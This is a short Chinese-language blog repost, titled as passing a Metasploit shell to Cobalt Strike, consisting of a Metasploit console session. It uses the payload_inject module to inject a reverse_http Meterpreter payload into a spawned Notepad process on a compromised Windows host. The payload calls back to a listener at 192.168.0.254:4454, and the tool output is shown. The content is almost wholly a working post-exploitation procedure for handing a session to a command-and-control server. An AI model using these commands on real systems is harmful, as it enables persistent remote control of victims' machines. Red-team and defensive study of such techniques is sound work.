首页 > Web开发 > 详细

metasploit派生一个shell给cobaltstrike

时间:2020-03-04 14:34:08      阅读:114      评论:0      收藏:0      [点我收藏+]

1、cobaltstrike创建监听器

技术分享图片

 

 2、metasploit派生shell

msf5 exploit(multi/handler) > use exploit/windows/local/payload_inject

msf5 exploit(windows/local/payload_inject) > set payload windows/meterpreter/reverse_http

payload => windows/meterpreter/reverse_http

msf5 exploit(windows/local/payload_inject) > set lhost 192.168.0.254

lhost => 192.168.0.254

msf5 exploit(windows/local/payload_inject) > set session 1

session => 1

msf5 exploit(windows/local/payload_inject) > set lport 4454

lport => 4454

msf5 exploit(windows/local/payload_inject) > set disablepayloadhandler true

disablepayloadhandler => true

msf5 exploit(windows/local/payload_inject) > exploit

[*] Running module against WIN-KNM1L8FAL1D
[*] Spawned Notepad process 2152
[*] Injecting payload into 2152
[*] Preparing ‘windows/meterpreter/reverse_http‘ for PID 2152

metasploit派生一个shell给cobaltstrike

原文:https://www.cnblogs.com/yyxianren/p/12408789.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!